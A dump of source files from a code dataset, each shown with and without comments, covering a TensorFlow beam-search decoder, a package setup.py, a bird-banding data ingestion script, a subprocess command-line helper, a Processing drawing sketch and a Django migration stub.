called and its step has been incremented. This is caused by the fact
that we call the decoder body function at the end of the beam body
function. (And that, in turn, is to support ensembling.)
Arguments:
args: A ``BeamSearchLoopState`` instance.
Returns:
A scalar boolean ``Tensor``.
"""
loop_state = BeamSearchLoopState(*args)
beam_step = loop_state.decoder_loop_state.feedables.step - 1
finished = loop_state.search_state.finished
max_step_cond = tf.less(beam_step, self.max_steps)
unfinished_cond = tf.logical_not(tf.reduce_all(finished))
return tf.logical_and(max_step_cond, unfinished_cond)
def decoding_loop(self) -> BeamSearchOutput:
"""Create the decoding loop.
This function mimics the behavior of the ``decoding_loop`` method of
the ``AutoregressiveDecoder``, except the initial loop state is created
outside this method because it is accessed and fed during ensembling.
TODO: The ``finalize_loop`` method and the handling of attention loop
states might be implemented in the future.
Returns:
This method returns a populated ``BeamSearchOutput`` object.
"""
final_loop_state = tf.while_loop(
self.loop_continue_criterion,
self.get_body(),
self.initial_loop_state,
shape_invariants=tf.contrib.framework.nest.map_structure(
get_state_shape_invariants, self.initial_loop_state))
# TODO: return att_loop_states properly
return BeamSearchOutput(
last_search_step_output=final_loop_state.search_results,
last_dec_loop_state=final_loop_state.decoder_loop_state,
last_search_state=final_loop_state.search_state,
attention_loop_states=[])
def get_body(self) -> Callable[[Any], BeamSearchLoopState]:
"""Return a body function for ``tf.while_loop``.
Returns:
A function that performs a single decoding step.
"""
decoder_body = self.parent_decoder.get_body(train_mode=False)
# pylint: disable=too-many-locals
def body(*args: Any) -> BeamSearchLoopState:
"""Execute a single beam search step.
An implementation of the beam search algorithm, which works as
follows:
1. Create a valid ``logprobs`` tensor which contains distributions
over the output tokens for each hypothesis in the beam. For
finished hypotheses, the log probabilities of all tokens except
the padding token are set to negative infinity.
2. Expand the beam by appending every possible token to every
               existing hypothesis. Update the log probability sum of each
hypothesis and its length (add one for unfinished hypotheses).
For each hypothesis, compute the score using the length penalty
term.
3. Select the ``beam_size`` best hypotheses from the score pool.
This is implemented by flattening the scores tensor and using
the ``tf.nn.top_k`` function.
4. Reconstruct the beam by gathering elements from the original
data structures using the data indices computed in the previous
step.
5. Call the ``body`` function of the underlying decoder.
6. Populate a new ``BeamSearchLoopState`` object with the selected
values and with the newly obtained decoder loop state.
Note that this function expects the decoder to be called at least
once prior the first execution.
Arguments:
args: An instance of the ``BeamSearchLoopState`` structure.
(see the docs for this module)
Returns:
A ``BeamSearchLoopState`` after one step of the decoding.
"""
loop_state = BeamSearchLoopState(*args)
dec_loop_state = loop_state.decoder_loop_state
search_state = loop_state.search_state
search_results = loop_state.search_results
# mask the probabilities
# shape(logprobs) = [batch, beam, vocabulary]
logprobs = search_state.prev_logprobs
finished_mask = tf.expand_dims(
tf.to_float(search_state.finished), 2)
unfinished_logprobs = (1. - finished_mask) * logprobs
finished_row = tf.one_hot(
PAD_TOKEN_INDEX,
len(self.vocabulary),
dtype=tf.float32,
on_value=0.,
off_value=-INF)
finished_logprobs = finished_mask * finished_row
logprobs = unfinished_logprobs + finished_logprobs
# update hypothesis scores
# shape(hyp_probs) = [batch, beam, vocabulary]
hyp_probs = tf.expand_dims(search_state.logprob_sum, 2) + logprobs
# update hypothesis lengths
hyp_lengths = search_state.lengths + 1 - tf.to_int32(
search_state.finished)
# shape(scores) = [batch, beam, vocabulary]
scores = hyp_probs / tf.expand_dims(
self._length_penalty(hyp_lengths), 2)
# reshape to [batch, beam * vocabulary] for topk
scores_flat = tf.reshape(
scores, [-1, self.beam_size * len(self.vocabulary)])
# shape(both) = [batch, beam]
topk_scores, topk_indices = tf.nn.top_k(
scores_flat, k=self.beam_size)
topk_indices.set_shape([None, self.beam_size])
topk_scores.set_shape([None, self.beam_size])
next_word_ids = tf.mod(topk_indices, len(self.vocabulary))
next_beam_ids = tf.div(topk_indices, len(self.vocabulary))
# batch offset for tf.gather_nd
batch_offset = tf.tile(
tf.expand_dims(tf.range(self.batch_size), 1),
[1, self.beam_size])
batch_beam_ids = tf.stack([batch_offset, next_beam_ids], axis=2)
# gather the topk logprob_sums
next_beam_lengths = tf.gather_nd(hyp_lengths, batch_beam_ids)
next_beam_logprob_sum = tf.gather_nd(
tf.reshape(
hyp_probs, [-1, self.beam_size * len(self.vocabulary)]),
tf.stack([batch_offset, topk_indices], axis=2))
# mark finished beams
next_finished = tf.gather_nd(search_state.finished, batch_beam_ids)
next_just_finished = tf.equal(next_word_ids, END_TOKEN_INDEX)
next_finished = tf.logical_or(next_finished, next_just_finished)
# we need to flatten the feedables for the parent_decoder
next_feedables = tf.contrib.framework.nest.map_structure(
lambda x: gather_flat(x, batch_beam_ids,
self.batch_size, self.beam_size),
dec_loop_state.feedables)
next_feedables = next_feedables._replace(
input_symbol=tf.reshape(next_word_ids, [-1]),
finished=tf.reshape(next_finished, [-1]))
# histories have shape [len, batch, ...]
def gather_fn(x):
return partial_transpose(
gather_flat(
partial_transpose(x, [1, 0]),
batch_beam_ids,
self.batch_size,
self.beam_size),
[1, 0])
next_histories = tf.contrib.framework.nest.map_structure(
gather_fn, dec_loop_state.histories)
dec_loop_state = dec_loop_state._replace(
feedables=next_feedables,
histories=next_histories)
# CALL THE DECODER BODY FUNCTION
next_loop_state = decoder_body(*dec_loop_state)
next_search_state = SearchState(
logprob_sum=next_beam_logprob_sum,
prev_logprobs=tf.reshape(
tf.nn.log_softmax(next_loop_state.feedables.prev_logits),
[self.batch_size, self.beam_size, len(self.vocabulary)]),
lengths=next_beam_lengths,
finished=next_finished)
next_token_ids = tf.transpose(search_results.token_ids, [1, 2, 0])
next_token_ids = tf.gather_nd(next_token_ids, batch_beam_ids)
next_token_ids = tf.transpose(next_token_ids, [2, 0, 1])
next_output = SearchResults(
scores=topk_scores,
token_ids=append_tensor(next_token_ids, next_word_ids))
return BeamSearchLoopState(
search_state=next_search_state,
search_results=next_output,
decoder_loop_state=next_loop_state)
# pylint: enable=too-many-locals
return body
    def _length_penalty(self, lengths: tf.Tensor) -> tf.Tensor:
        """Apply length penalty ("lp") term from Eq. 14.

        https://arxiv.org/pdf/1609.08144.pdf

        ``self.length_normalization`` is the alpha parameter of the
        equation; with alpha == 0 the penalty is a constant 1 and the
        hypothesis score reduces to the plain log-probability sum.

        Arguments:
            lengths: A ``Tensor`` of lengths of the hypotheses in the beam.

        Returns:
            A float ``Tensor`` with the length penalties for each hypothesis
            in the beam.
        """
        return ((5. + tf.to_float(lengths)) / 6.) ** self.length_normalization
def expand_to_beam(self, val: tf.Tensor, dim: int = 0) -> tf.Tensor:
"""Copy a tensor along a new beam dimension.
Arguments:
val: The ``Tensor`` to expand.
dim: The dimension along which to expand. Usually, the batch axis.
Returns:
The expanded tensor.
"""
orig_shape = get_shape_list(val)
if val.shape.ndims == 0:
return val
orig_shape[dim] *= self.beam_size
tile_shape = [1] * (len(orig_shape) + 1)
tile_shape[dim + 1] = self.beam_size
val = tf.tile(tf.expand_dims(val, 1), tile_shape)
val = tf.reshape(val, orig_shape)
return val | pt | 0.200339 | 2.831749 | 3 |
setup.py | CBDRH/cdeid | 0 | 13575 | <gh_stars>0
from setuptools import setup, find_packages
# The PyPI long description is taken verbatim from the README.
with open('README.md', "r") as f:
    readme = f.read()
# NOTE(review): the LICENSE text is read but never used below --
# presumably it was meant to be passed to setup(); confirm.
with open('LICENSE') as f:
    license_content = f.read()
setup(
    name='cdeid',
    version='0.1.2',
    author='<NAME>',
    author_email='<EMAIL>',
    description='A Customized De-identification framework',
    long_description_content_type='text/markdown',
    long_description=readme,
    url='https://github.com/CBDRH/cdeid',
    keywords=['DE-IDENTIFICATION', 'NLP'],
    # Runtime dependencies; flair is pinned exactly, the rest are minimums.
    install_requires=[
        'spaCy>=2.3.2',
        'stanza>=1.1.1',
        'flair==0.8',
        'mako>=1.1.3'
    ],
    packages=find_packages(exclude=('tests', 'docs')),
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
    ],
    python_requires='>=3.7'
)
| from setuptools import setup, find_packages
with open('README.md', "r") as f:
readme = f.read()
with open('LICENSE') as f:
license_content = f.read()
setup(
name='cdeid',
version='0.1.2',
author='<NAME>',
author_email='<EMAIL>',
description='A Customized De-identification framework',
long_description_content_type='text/markdown',
long_description=readme,
url='https://github.com/CBDRH/cdeid',
keywords=['DE-IDENTIFICATION', 'NLP'],
install_requires=[
'spaCy>=2.3.2',
'stanza>=1.1.1',
'flair==0.8',
'mako>=1.1.3'
],
packages=find_packages(exclude=('tests', 'docs')),
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
],
python_requires='>=3.7'
) | none | 1 | 1.329053 | 1 |
pylib/bbl_ingest.py | rafelafrance/sightings-database | 4 | 13576 | """Ingest USGS Bird Banding Laboratory data."""
from pathlib import Path
import pandas as pd
from . import db, util
DATASET_ID = 'bbl'
RAW_DIR = Path('data') / 'raw' / DATASET_ID
BANDING = RAW_DIR / 'Banding'
ENCOUNTERS = RAW_DIR / 'Encounters'
RECAPTURES = RAW_DIR / 'Recaptures'
SPECIES = RAW_DIR / 'species.html'
ONE_MIN = 111.32 * 1000
TEN_MIN = 111.32 * 1000 * 10
EXACT = 0
def ingest():
    """Ingest USGS Bird Banding Laboratory data.

    Clears any previously ingested BBL records, registers the dataset,
    then loads the banding, encounter, and recapture CSVs in that
    order. A single place cache (``to_place_id``) is threaded through
    all three loads so identical places are inserted only once.
    """
    db.delete_dataset_records(DATASET_ID)
    to_taxon_id = get_taxa()
    db.insert_dataset({
        'dataset_id': DATASET_ID,
        'title': 'Bird Banding Laboratory (BBL)',
        'version': '2020.0',
        'url': ('https://www.usgs.gov/centers/pwrc/science/'
                'bird-banding-laboratory')})
    # Maps (lng, lat, radius) -> place_id, shared across all sources.
    to_place_id = {}
    to_place_id = insert_banding_data(to_place_id, to_taxon_id)
    to_place_id = insert_encounter_data(
        ENCOUNTERS, to_place_id, to_taxon_id, 'encounter')
    insert_encounter_data(RECAPTURES, to_place_id, to_taxon_id, 'recapture')
def get_taxa():
    """Build a taxa table to link to our taxa.

    Joins the BBL species list (scraped HTML page) with our own bird
    taxa on scientific name.

    Returns:
        dict: 4-digit, zero-padded BBL species ID -> our ``taxon_id``.
        Species whose scientific name we do not have are dropped.
    """
    # Scientific name -> BBL species number, from the species HTML page.
    codes = pd.read_html(str(SPECIES))[0]
    codes = codes.rename(columns={
        'Scientific Name': 'sci_name',
        'Species Number': 'species_id'})
    codes = codes[codes['sci_name'].notna()]
    codes = codes.set_index('sci_name')['species_id'].to_dict()
    # Scientific name -> our taxon_id, birds only.
    sql = """SELECT taxon_id, sci_name FROM taxa WHERE "class"='aves';"""
    taxa = pd.read_sql(sql, db.connect())
    taxa = taxa.set_index('sci_name')['taxon_id'].to_dict()
    # The walrus filter drops species whose name is unknown to us
    # (taxa.get() returns None, which is falsy).
    to_taxon_id = {str(v).zfill(4): i for k, v in codes.items()
                   if (i := taxa.get(k))}
    return to_taxon_id
def insert_banding_data(to_place_id, to_taxon_id):
    """Insert raw banding data.

    Walks every CSV in the Banding directory, filters each file, and
    writes place, event, and count records for it.

    Args:
        to_place_id (dict): cache mapping place keys to place IDs,
            shared across files so duplicate places are inserted once.
        to_taxon_id (dict): BBL species ID -> our taxon ID.

    Returns:
        dict: the updated ``to_place_id`` cache.
    """
    util.log(f'Inserting {DATASET_ID} banding data')
    for path in sorted(BANDING.glob('*.csv')):
        util.log(f'File {path}')
        df = read_csv(
            path, 'LON_DECIMAL_DEGREES', 'LAT_DECIMAL_DEGREES', 'banding')
        df = filter_data(
            df, to_taxon_id, 'BANDING_DATE', 'SPECIES_ID', 'COORD_PRECISION')
        to_place_id = insert_places(df, to_place_id, 'COORD_PRECISION')
        # Columns preserved verbatim in the events' JSON payload.
        event_json = """ BAND_NUM BANDING_DATE TYPE """.split()
        insert_events(df, event_json)
        # Columns preserved verbatim in the counts' JSON payload.
        count_json = """
            AGE_CODE SEX_CODE SPECIES_ID SPECIES_NAME TYPE """.split()
        insert_counts(df, count_json)
    return to_place_id
def insert_encounter_data(dir_, to_place_id, to_taxon_id, type_):
    """Insert raw encounter and recapture data.

    Same pipeline as ``insert_banding_data`` but for the encounter-style
    CSV layout (``E_``/``B_`` column prefixes).

    Args:
        dir_: directory holding the CSVs (Encounters or Recaptures).
        to_place_id (dict): shared place cache; see ``insert_places``.
        to_taxon_id (dict): BBL species ID -> our taxon ID.
        type_: record type label, ``'encounter'`` or ``'recapture'``.

    Returns:
        dict: the updated ``to_place_id`` cache.
    """
    util.log(f'Inserting {DATASET_ID} {type_} data')
    for path in sorted(dir_.glob('*.csv')):
        util.log(f'File {path}')
        df = read_csv(
            path, 'E_LON_DECIMAL_DEGREES', 'E_LAT_DECIMAL_DEGREES', type_)
        df = filter_data(
            df, to_taxon_id,
            'ENCOUNTER_DATE', 'B_SPECIES_ID', 'E_COORD_PRECISION')
        to_place_id = insert_places(df, to_place_id, 'E_COORD_PRECISION')
        # Columns preserved verbatim in the events' JSON payload.
        event_json = """ BAND_NUM ENCOUNTER_DATE TYPE """.split()
        insert_events(df, event_json)
        # Columns preserved verbatim in the counts' JSON payload.
        count_json = """
            B_AGE_CODE B_SEX_CODE B_SPECIES_ID B_SPECIES_NAME MIN_AGE_AT_ENC
            ORIGINAL_BAND TYPE """.split()
        insert_counts(df, count_json)
    return to_place_id
def read_csv(path, lng, lat, type_):
    """Load one raw CSV as strings and tag it for this dataset.

    All columns are read as unicode with missing cells blanked, column
    names are normalized, the given longitude/latitude columns are
    renamed to ``lng``/``lat``, and record-type / dataset-id columns
    are attached.
    """
    frame = pd.read_csv(path, dtype='unicode').fillna('')
    util.normalize_columns_names(frame)
    frame = frame.rename(columns={lng: 'lng', lat: 'lat'})
    frame['TYPE'] = type_
    frame['dataset_id'] = DATASET_ID
    return frame
def filter_data(df, to_taxon_id, event_date, species_id, coord_precision):
    """Remove records that will not work for our analysis.

    Adds parsed ``date`` and mapped ``taxon_id`` columns, then keeps
    only rows that have a parsable date, a species we recognize, and a
    coordinate precision finer than country/state level.
    """
    df['date'] = pd.to_datetime(df[event_date], errors='coerce')
    df['taxon_id'] = df[species_id].map(to_taxon_id)
    # Precision codes '12' (state) and '72' (country) cover far too
    # large an area to be useful.
    usable_area = ~df[coord_precision].isin(['12', '72'])
    keep = usable_area & df['taxon_id'].notna() & df['date'].notna()
    return df.loc[keep]
def insert_places(df, to_place_id, coord_precision):
    """Insert place records.

    Derives an uncertainty radius from the coordinate precision code,
    de-duplicates places on (lng, lat, radius), inserts only places not
    already present in the ``to_place_id`` cache, and attaches a
    ``place_id`` column to ``df``.

    Returns:
        dict: the cache updated with any newly inserted places.
    """
    util.filter_lng_lat(df, 'lng', 'lat')
    # Radius defaults to the ten-minute value; code '0' means exact
    # coordinates and codes '1'/'60' get the one-minute radius.
    df['radius'] = TEN_MIN
    df.loc[df[coord_precision] == '0', 'radius'] = EXACT
    df.loc[df[coord_precision].isin(['1', '60']), 'radius'] = ONE_MIN
    df['place_key'] = tuple(zip(df.lng, df.lat, df.radius))
    places = df.drop_duplicates('place_key')
    # Only insert places we have not seen in an earlier file.
    old_places = places['place_key'].isin(to_place_id)
    places = places[~old_places]
    places['place_id'] = db.create_ids(places, 'places')
    places['place_json'] = util.json_object(places, [coord_precision])
    places.loc[:, db.PLACE_FIELDS].to_sql(
        'places', db.connect(), if_exists='append', index=False)
    # Extend the cache, then map every row (old and new) to its place.
    new_place_ids = places.set_index('place_key')['place_id'].to_dict()
    to_place_id = {**to_place_id, **new_place_ids}
    df['place_id'] = df['place_key'].map(to_place_id)
    return to_place_id
def insert_events(df, event_json):
    """Insert event records.

    Args:
        df: filtered records carrying a parsed ``date`` column.
        event_json: names of columns to keep in the event JSON payload.
    """
    df['event_id'] = db.create_ids(df, 'events')
    df['year'] = df['date'].dt.strftime('%Y')
    df['day'] = df['date'].dt.strftime('%j')  # day of year, 001-366
    # No start/end times are attached for these records.
    df['started'] = None
    df['ended'] = None
    df['event_json'] = util.json_object(df, event_json)
    df.loc[:, db.EVENT_FIELDS].to_sql(
        'events', db.connect(), if_exists='append', index=False)
def insert_counts(df, count_json):
    """Insert count records.

    The count is always 1 -- presumably each source row represents a
    single banded or encountered bird (confirm against BBL docs).
    """
    df['count_id'] = db.create_ids(df, 'counts')
    df['count'] = 1
    df['count_json'] = util.json_object(df, count_json)
    df.loc[:, db.COUNT_FIELDS].to_sql(
        'counts', db.connect(), if_exists='append', index=False)
if __name__ == '__main__':
ingest()
| """Ingest USGS Bird Banding Laboratory data."""
from pathlib import Path
import pandas as pd
from . import db, util
DATASET_ID = 'bbl'
RAW_DIR = Path('data') / 'raw' / DATASET_ID
BANDING = RAW_DIR / 'Banding'
ENCOUNTERS = RAW_DIR / 'Encounters'
RECAPTURES = RAW_DIR / 'Recaptures'
SPECIES = RAW_DIR / 'species.html'
ONE_MIN = 111.32 * 1000
TEN_MIN = 111.32 * 1000 * 10
EXACT = 0
def ingest():
"""Ingest USGS Bird Banding Laboratory data."""
db.delete_dataset_records(DATASET_ID)
to_taxon_id = get_taxa()
db.insert_dataset({
'dataset_id': DATASET_ID,
'title': 'Bird Banding Laboratory (BBL)',
'version': '2020.0',
'url': ('https://www.usgs.gov/centers/pwrc/science/'
'bird-banding-laboratory')})
to_place_id = {}
to_place_id = insert_banding_data(to_place_id, to_taxon_id)
to_place_id = insert_encounter_data(
ENCOUNTERS, to_place_id, to_taxon_id, 'encounter')
insert_encounter_data(RECAPTURES, to_place_id, to_taxon_id, 'recapture')
def get_taxa():
"""Build a taxa table to link to our taxa."""
codes = pd.read_html(str(SPECIES))[0]
codes = codes.rename(columns={
'Scientific Name': 'sci_name',
'Species Number': 'species_id'})
codes = codes[codes['sci_name'].notna()]
codes = codes.set_index('sci_name')['species_id'].to_dict()
sql = """SELECT taxon_id, sci_name FROM taxa WHERE "class"='aves';"""
taxa = pd.read_sql(sql, db.connect())
taxa = taxa.set_index('sci_name')['taxon_id'].to_dict()
to_taxon_id = {str(v).zfill(4): i for k, v in codes.items()
if (i := taxa.get(k))}
return to_taxon_id
def insert_banding_data(to_place_id, to_taxon_id):
"""Insert raw banding data."""
util.log(f'Inserting {DATASET_ID} banding data')
for path in sorted(BANDING.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'LON_DECIMAL_DEGREES', 'LAT_DECIMAL_DEGREES', 'banding')
df = filter_data(
df, to_taxon_id, 'BANDING_DATE', 'SPECIES_ID', 'COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'COORD_PRECISION')
event_json = """ BAND_NUM BANDING_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
AGE_CODE SEX_CODE SPECIES_ID SPECIES_NAME TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def insert_encounter_data(dir_, to_place_id, to_taxon_id, type_):
"""Insert raw encounter and recapture data."""
util.log(f'Inserting {DATASET_ID} {type_} data')
for path in sorted(dir_.glob('*.csv')):
util.log(f'File {path}')
df = read_csv(
path, 'E_LON_DECIMAL_DEGREES', 'E_LAT_DECIMAL_DEGREES', type_)
df = filter_data(
df, to_taxon_id,
'ENCOUNTER_DATE', 'B_SPECIES_ID', 'E_COORD_PRECISION')
to_place_id = insert_places(df, to_place_id, 'E_COORD_PRECISION')
event_json = """ BAND_NUM ENCOUNTER_DATE TYPE """.split()
insert_events(df, event_json)
count_json = """
B_AGE_CODE B_SEX_CODE B_SPECIES_ID B_SPECIES_NAME MIN_AGE_AT_ENC
ORIGINAL_BAND TYPE """.split()
insert_counts(df, count_json)
return to_place_id
def read_csv(path, lng, lat, type_):
"""Read in a CSV file."""
df = pd.read_csv(path, dtype='unicode').fillna('')
util.normalize_columns_names(df)
df = df.rename(columns={lng: 'lng', lat: 'lat'})
df['TYPE'] = type_
df['dataset_id'] = DATASET_ID
return df
def filter_data(df, to_taxon_id, event_date, species_id, coord_precision):
    """Remove records that will not work for our analysis.

    Adds parsed ``date`` and mapped ``taxon_id`` columns, then keeps
    only rows that have a parsable date, a species we recognize, and a
    coordinate precision finer than country/state level.
    """
    df['date'] = pd.to_datetime(df[event_date], errors='coerce')
    df['taxon_id'] = df[species_id].map(to_taxon_id)
    # Precision codes '12' (state) and '72' (country) cover far too
    # large an area to be useful.
    usable_area = ~df[coord_precision].isin(['12', '72'])
    keep = usable_area & df['taxon_id'].notna() & df['date'].notna()
    return df.loc[keep]
def insert_places(df, to_place_id, coord_precision):
"""Insert place records."""
util.filter_lng_lat(df, 'lng', 'lat')
df['radius'] = TEN_MIN
df.loc[df[coord_precision] == '0', 'radius'] = EXACT
df.loc[df[coord_precision].isin(['1', '60']), 'radius'] = ONE_MIN
df['place_key'] = tuple(zip(df.lng, df.lat, df.radius))
places = df.drop_duplicates('place_key')
old_places = places['place_key'].isin(to_place_id)
places = places[~old_places]
places['place_id'] = db.create_ids(places, 'places')
places['place_json'] = util.json_object(places, [coord_precision])
places.loc[:, db.PLACE_FIELDS].to_sql(
'places', db.connect(), if_exists='append', index=False)
new_place_ids = places.set_index('place_key')['place_id'].to_dict()
to_place_id = {**to_place_id, **new_place_ids}
df['place_id'] = df['place_key'].map(to_place_id)
return to_place_id
def insert_events(df, event_json):
"""Insert event records."""
df['event_id'] = db.create_ids(df, 'events')
df['year'] = df['date'].dt.strftime('%Y')
df['day'] = df['date'].dt.strftime('%j')
df['started'] = None
df['ended'] = None
df['event_json'] = util.json_object(df, event_json)
df.loc[:, db.EVENT_FIELDS].to_sql(
'events', db.connect(), if_exists='append', index=False)
def insert_counts(df, count_json):
"""Insert count records."""
df['count_id'] = db.create_ids(df, 'counts')
df['count'] = 1
df['count_json'] = util.json_object(df, count_json)
df.loc[:, db.COUNT_FIELDS].to_sql(
'counts', db.connect(), if_exists='append', index=False)
if __name__ == '__main__':
ingest()
| en | 0.303969 | 2.750606 | 3 |
pyhdtoolkit/utils/cmdline.py | fsoubelet/PyhDToolk | 5 | 13577 | <reponame>fsoubelet/PyhDToolk<filename>pyhdtoolkit/utils/cmdline.py
"""
Module utils.cmdline
--------------------
Created on 2019.11.06
:author: <NAME> (<EMAIL>)
Utility script to help run commands and access the commandline.
"""
import errno
import os
import signal
import subprocess
from typing import Mapping, Optional, Tuple
from loguru import logger
from pyhdtoolkit.utils.contexts import timeit
class CommandLine:
"""
A high-level object to encapsulate the different methods for interacting with the commandline.
"""
@staticmethod
def check_pid_exists(pid: int) -> bool:
"""
Check whether the given PID exists in the current process table.
Args:
pid (int): the Process ID you want to check.
Returns:
A boolean stating the result.
"""
if pid == 0:
# According to "man 2 kill", PID 0 refers to <<every process in the process group of
# the calling process>>. Best not to go any further.
logger.warning("PID 0 refers to 'every process in calling processes', and should be untouched")
return True
try:
# Sending SIG 0 only checks if process has terminated, we're not actually terminating it
os.kill(pid, 0)
except OSError as pid_checkout_error:
if pid_checkout_error.errno == errno.ESRCH: # ERROR "No such process"
return False
if (
pid_checkout_error.errno == errno.EPERM
): # ERROR "Operation not permitted" -> there's a process to deny access to.
return True
# According to "man 2 kill" possible error values are (EINVAL, EPERM, ESRCH), therefore
# we should never get here. If so let's be explicit in considering this an error.
logger.exception("Could not figure out the provided PID for some reason")
raise
return True
@staticmethod
def run(
command: str, shell: bool = True, env: Mapping = None, timeout: float = None
) -> Tuple[Optional[int], bytes]:
"""
Run command based on `subprocess.Popen` and return the tuple of `(returncode, stdout)`.
Note that `stderr` is redirected to `stdout`. `shell` is same to parameter of `Popen`.
If the process does not terminate after `timeout` seconds, a `TimeoutExpired` exception
will be raised.
Args:
command (str): string, the command you want to run.
shell (bool): same as `Popen` argument. Setting the shell argument to a true value
causes subprocess to spawn an intermediate shell process, and tell it to run the
command. In other words, using an intermediate shell means that variables, glob
patterns, and other special shell features in the command string are processed
before the command is ran. Defaults to True.
env (Mapping): mapping that defines the environment variables for the new process.
timeout (float): same as `Popen.communicate` argument, number of seconds to wait for a
response before raising a TimeoutExpired exception.
Returns:
The tuple of (returncode, stdout). Beware, the stdout will be a byte array (id est
b'some returned text'). This output, returned as stdout, needs to be decoded properly
before you do anything with it, especially if you intend to log it into a file. While
it will most likely be 'utf-8', the encoding can vary from system to system so the
standard output is returned in bytes format and should be decoded later on.
Usage:
CommandLine.run('echo hello') -> (0, b'hello\r\n')
modified_env = os.environ.copy()
modified_env['ENV_VAR'] = new_value
CommandLine.run('echo $ENV_VAR', env=modified_env) -> (0, b'new_value')
"""
with timeit(
lambda spanned: logger.info(f"Ran command '{command}' in a subprocess, in: {spanned:.4f} seconds")
):
process = subprocess.Popen(
command, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env
)
stdout, _ = process.communicate(timeout=timeout)
if process.poll() != 0:
logger.warning(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
else:
logger.success(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
return process.poll(), stdout
@staticmethod
def terminate(pid: int) -> bool:
"""
Terminate process by given pid. On Other platforms, using os.kill with signal.SIGTERM
to kill.
Args:
pid (int): the process ID to kill.
Returns:
A boolean stating the success of the operation.
"""
if CommandLine.check_pid_exists(pid):
os.kill(pid, signal.SIGTERM)
logger.debug(f"Process {pid} has successfully been terminated.")
return True
logger.error(f"Process with ID {pid} could not be terminated.")
return False
| """
Module utils.cmdline
--------------------
Created on 2019.11.06
:author: <NAME> (<EMAIL>)
Utility script to help run commands and access the commandline.
"""
import errno
import os
import signal
import subprocess
from typing import Mapping, Optional, Tuple
from loguru import logger
from pyhdtoolkit.utils.contexts import timeit
class CommandLine:
"""
A high-level object to encapsulate the different methods for interacting with the commandline.
"""
@staticmethod
def check_pid_exists(pid: int) -> bool:
"""
Check whether the given PID exists in the current process table.
Args:
pid (int): the Process ID you want to check.
Returns:
A boolean stating the result.
"""
if pid == 0:
# According to "man 2 kill", PID 0 refers to <<every process in the process group of
# the calling process>>. Best not to go any further.
logger.warning("PID 0 refers to 'every process in calling processes', and should be untouched")
return True
try:
# Sending SIG 0 only checks if process has terminated, we're not actually terminating it
os.kill(pid, 0)
except OSError as pid_checkout_error:
if pid_checkout_error.errno == errno.ESRCH: # ERROR "No such process"
return False
if (
pid_checkout_error.errno == errno.EPERM
): # ERROR "Operation not permitted" -> there's a process to deny access to.
return True
# According to "man 2 kill" possible error values are (EINVAL, EPERM, ESRCH), therefore
# we should never get here. If so let's be explicit in considering this an error.
logger.exception("Could not figure out the provided PID for some reason")
raise
return True
@staticmethod
def run(
command: str, shell: bool = True, env: Mapping = None, timeout: float = None
) -> Tuple[Optional[int], bytes]:
"""
Run command based on `subprocess.Popen` and return the tuple of `(returncode, stdout)`.
Note that `stderr` is redirected to `stdout`. `shell` is same to parameter of `Popen`.
If the process does not terminate after `timeout` seconds, a `TimeoutExpired` exception
will be raised.
Args:
command (str): string, the command you want to run.
shell (bool): same as `Popen` argument. Setting the shell argument to a true value
causes subprocess to spawn an intermediate shell process, and tell it to run the
command. In other words, using an intermediate shell means that variables, glob
patterns, and other special shell features in the command string are processed
before the command is ran. Defaults to True.
env (Mapping): mapping that defines the environment variables for the new process.
timeout (float): same as `Popen.communicate` argument, number of seconds to wait for a
response before raising a TimeoutExpired exception.
Returns:
The tuple of (returncode, stdout). Beware, the stdout will be a byte array (id est
b'some returned text'). This output, returned as stdout, needs to be decoded properly
before you do anything with it, especially if you intend to log it into a file. While
it will most likely be 'utf-8', the encoding can vary from system to system so the
standard output is returned in bytes format and should be decoded later on.
Usage:
CommandLine.run('echo hello') -> (0, b'hello\r\n')
modified_env = os.environ.copy()
modified_env['ENV_VAR'] = new_value
CommandLine.run('echo $ENV_VAR', env=modified_env) -> (0, b'new_value')
"""
with timeit(
lambda spanned: logger.info(f"Ran command '{command}' in a subprocess, in: {spanned:.4f} seconds")
):
process = subprocess.Popen(
command, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env
)
stdout, _ = process.communicate(timeout=timeout)
if process.poll() != 0:
logger.warning(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
else:
logger.success(f"Subprocess command '{command}' finished with exit code: {process.poll()}")
return process.poll(), stdout
@staticmethod
def terminate(pid: int) -> bool:
"""
Terminate process by given pid. On Other platforms, using os.kill with signal.SIGTERM
to kill.
Args:
pid (int): the process ID to kill.
Returns:
A boolean stating the success of the operation.
"""
if CommandLine.check_pid_exists(pid):
os.kill(pid, signal.SIGTERM)
logger.debug(f"Process {pid} has successfully been terminated.")
return True
logger.error(f"Process with ID {pid} could not be terminated.")
return False | pt | 0.189348 | 2.357865 | 2 |
sketches/noll/noll.pyde | kantel/processingpy | 4 | 13578 | <reponame>kantel/processingpy
from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. <NAME>")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2
| from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. <NAME>")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2 | none | 1 | 3.114446 | 3 |
minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | 0 | 13579 | # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
